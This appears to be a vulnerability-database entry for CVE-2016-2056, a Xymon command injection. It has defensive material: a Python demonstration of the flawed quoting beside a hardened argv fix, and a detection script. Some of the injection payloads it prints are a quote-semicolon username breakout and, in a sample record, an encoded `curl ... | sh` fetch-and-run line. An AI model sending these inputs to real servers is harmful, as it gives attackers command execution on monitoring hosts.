cbcvebase.
CVE-2016-2056
published 2016-04-13


Priority: P2 (73), high
CVSS 3.0: 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
Exploit: public exploit available
EPSS: 54.51% (98.9th percentile)
xymond in Xymon 4.1.x, 4.2.x, and 4.3.x before 4.3.25 allows remote authenticated users to execute arbitrary commands via shell metacharacters in the adduser_name argument in (1) web/useradm.c or (2) web/chpasswd.c.
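The script below is an added example, not Xymon's code and not the exploit module: it shows why a username pasted into a single-quoted argument of a system() command line is escaped by the quote/semicolon/ampersand pattern, and the argv-based form that closes the hole. The htpasswd binary name, the password file path and the exact command template are assumptions (a hypothetical analogue of the pattern the description refers to, chosen to match the payload shape `';${cmd} & echo '` listed under the IOCs), and the payload itself is constructed.

```python
"""Added example (not Xymon's code): a quoted system() command line versus
an argv list, exercised with a constructed injection payload."""
import re
import shlex
import subprocess

# Constructed payload in the shape of the IOC on this page: close the quoted
# username, run an attacker command in the background, and let `echo`
# swallow the remainder of the original command line.
PAYLOAD = "';id > /tmp/pwned & echo '"

HTPASSWD = "htpasswd"                   # assumed binary name
PASSFILE = "/etc/xymon/xymonpasswd"     # assumed path, not taken from the page


def build_vulnerable_command(username: str, password: str) -> str:
    """Hypothetical analogue of the vulnerable pattern: wrapping the value in
    single quotes does nothing against a value that itself contains a quote."""
    return f"{HTPASSWD} -b '{PASSFILE}' '{username}' '{password}'"


def shell_tokens(cmd: str) -> list[str]:
    """Tokenize the string the way a POSIX shell would, with ; & | < > ( )
    as operator tokens, so we can see whether the username stayed inside
    one argument or became separate commands."""
    lex = shlex.shlex(cmd, posix=True, punctuation_chars=True)
    return list(lex)


# Allowlist for account names; anything else is rejected before any exec.
USERNAME_RE = re.compile(r"[A-Za-z0-9_.@-]{1,64}")


def safe_htpasswd_argv(username: str, password: str) -> list[str]:
    """Hardened form: validate the username and build an argv list so that no
    shell ever parses it. Returns the argv or raises ValueError."""
    if not USERNAME_RE.fullmatch(username):
        raise ValueError("username contains characters outside the allowlist")
    return [HTPASSWD, "-b", PASSFILE, username, password]


def add_user(username: str, password: str) -> None:
    """Run the hardened command; no shell=True, so metacharacters are inert."""
    subprocess.run(safe_htpasswd_argv(username, password), check=True)


if __name__ == "__main__":
    # The payload turns one argument into: '' ; id > /tmp/pwned & echo '' 'x'
    print(shell_tokens(build_vulnerable_command(PAYLOAD, "x")))
    print(safe_htpasswd_argv("alice", "x"))
```

Running it prints the token list for the payload case, where `;`, `id`, `>` and `&` appear as their own shell tokens, against the five-token list a benign username produces; the allowlist plus argv form is what a fix of this class of bug looks like regardless of how the shell string was quoted.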

Affected

38 ranges · showing 25

Vendor   Product        Version range                  Fixed in
debian   debian_linux   (not shown)                    (not shown)
debian   xymon          < xymon 4.3.25-1 (bookworm)    xymon 4.3.25-1 (bookworm)
xymon    xymon          (23 rows; version ranges not shown on this page)

Detection & IOCs (extracted from sources)

URL:      /xymon-seccgi/useradm.sh
Path:     /xymon-seccgi/
Command:  USERNAME=';${cmd} & echo '&PASSWORD=&SendCreate=Create
Path:     web/useradm.c
Path:     web/chpasswd.c
  • Detect HTTP POST requests to /xymon-seccgi/useradm.sh whose USERNAME parameter contains shell metacharacters (single quote, semicolon, ampersand and the like); this is the injection vector used to break out of the quoted argument of the htpasswd system() call.
  • Alert on an HTTP 500 response from /xymon-seccgi/useradm.sh following an authenticated POST: the exploit module treats a 500 as confirmation that the payload was delivered.
  • Monitor authenticated HTTP GET requests to /xymon-seccgi/useradm.sh as a reconnaissance step preceding exploitation; the module probes this endpoint to fingerprint the Xymon version before attempting command injection.
  • Flag web server processes (Apache/nginx CGI workers) spawning unexpected child processes such as shells or network utilities: the injected command runs as the web server user through the system() call behind useradm.sh.
  • Exploitation requires valid HTTP Basic Auth credentials for the Xymon web interface; unauthenticated attackers cannot reach the vulnerable endpoint.
  • The injected command runs with web server user privileges, not root; privilege escalation would be a separate post-exploitation step.
  • The Metasploit payload treats \x00, \x0A and \x0D (null byte, LF, CR) as bad characters that break the injection, so a payload avoids them in raw form; detection rules should URL-decode the parameters before matching on metacharacters rather than only matching the literal characters.
  • The default TARGETURI is /xymon-seccgi/ but may differ across installations; detections scoped only to that path miss non-default deployments, so match on the useradm.sh CGI name rather than the full prefix.
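To make the points above executable, the script below is an added example, not taken from the page's sources or from the Metasploit module. It runs over constructed request records in the shape a reverse proxy or WAF with request-body logging would produce (plain access logs do not carry the POST body that holds USERNAME); it URL-decodes the USERNAME parameter before looking for metacharacters, matches the useradm.sh name under any prefix so a non-default TARGETURI is still caught, and raises severity when the same client and user fetched the endpoint with GET first or received a 500. Every address, user name and body in the sample is constructed; the record format is an assumption.

```python
"""Added example: detection logic for the indicators above, run over
constructed request records (not real logs, not the page's or the module's code)."""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed records in the shape a reverse proxy/WAF with request-body
# logging might emit. Ordinary access logs lack the POST body entirely.
SAMPLE_REQUESTS = [
    {"ts": 1, "client": "10.0.0.5", "user": "admin", "method": "GET",
     "path": "/xymon-seccgi/useradm.sh", "body": "", "status": 200},
    {"ts": 2, "client": "10.0.0.5", "user": "admin", "method": "POST",
     "path": "/xymon-seccgi/useradm.sh",
     "body": "USERNAME=%27%3Bid+%3E+%2Ftmp%2Fp+%26+echo+%27&PASSWORD=&SendCreate=Create",
     "status": 500},
    {"ts": 3, "client": "10.0.0.9", "user": "ops", "method": "POST",
     "path": "/monitoring/useradm.sh",          # non-default TARGETURI, benign
     "body": "USERNAME=bob&PASSWORD=hunter2&SendCreate=Create", "status": 200},
    {"ts": 4, "client": "10.0.0.9", "user": "ops", "method": "POST",
     "path": "/monitoring/useradm.sh?x=1",      # non-default TARGETURI, injected
     "body": "USERNAME=x%27%3Bcurl+203.0.113.7%2Fs%7Csh+%26+echo+%27&PASSWORD=&SendCreate=Create",
     "status": 500},
]

# Characters that break out of a single-quoted shell argument or chain further
# commands. Raw LF/CR are bad chars for the public module, but flag them anyway.
SHELL_META = set(";&|`$'\"<>()\n\r")

# Match the CGI name under any prefix; /xymon-seccgi/ is only the default.
USERADM_RE = re.compile(r"/useradm\.sh$")

SEVERITY = {1: "medium", 2: "high", 3: "critical"}


def decode_form(body: str) -> dict:
    """URL-decode an application/x-www-form-urlencoded body. parse_qs splits on
    '&' first and then decodes %XX and '+', so %26 inside a value stays a
    literal '&' in that value and encoded metacharacters are revealed."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def has_shell_meta(value: str) -> bool:
    return any(c in SHELL_META for c in value)


def is_useradm(path: str) -> bool:
    """Strip any query string, then match the CGI name regardless of prefix."""
    return USERADM_RE.search(urlsplit(path).path) is not None


def analyze(records: list) -> list:
    """One alert per POST with metacharacters in USERNAME. Severity rises when
    the same client+user did the GET fingerprinting first, and again on a 500."""
    alerts = []
    recon = set()                       # (client, user) pairs seen doing GET
    for r in sorted(records, key=lambda r: r["ts"]):
        if not is_useradm(r["path"]):
            continue
        key = (r["client"], r["user"])
        if r["method"] == "GET":
            recon.add(key)
            continue
        if r["method"] != "POST":
            continue
        username = decode_form(r["body"]).get("USERNAME", "")
        if not has_shell_meta(username):
            continue
        score = 1 + (key in recon) + (r["status"] == 500)
        alerts.append({"ts": r["ts"], "client": r["client"], "user": r["user"],
                       "path": r["path"], "status": r["status"],
                       "username": username, "severity": SEVERITY[score]})
    return alerts


if __name__ == "__main__":
    for a in analyze(SAMPLE_REQUESTS):
        print(a["severity"].upper(), a["client"], a["user"], a["path"], repr(a["username"]))
```

On the sample the admin session scores critical (GET probe, injected POST, 500) and the ops session scores high (injected POST under a custom prefix with a 500, no prior GET), while the benign POST creating user bob produces nothing. The decoding step is what keeps `%27%3B` from slipping past a rule that only looks for literal quotes and semicolons.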

CVSS provenance

nvd            v3.0   8.8   HIGH     CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvd            v2.0   6.5   MEDIUM   AV:N/AC:L/Au:S/C:P/I:P/A:P
osv                   8.8   HIGH
vendor_debian         8.8   HIGH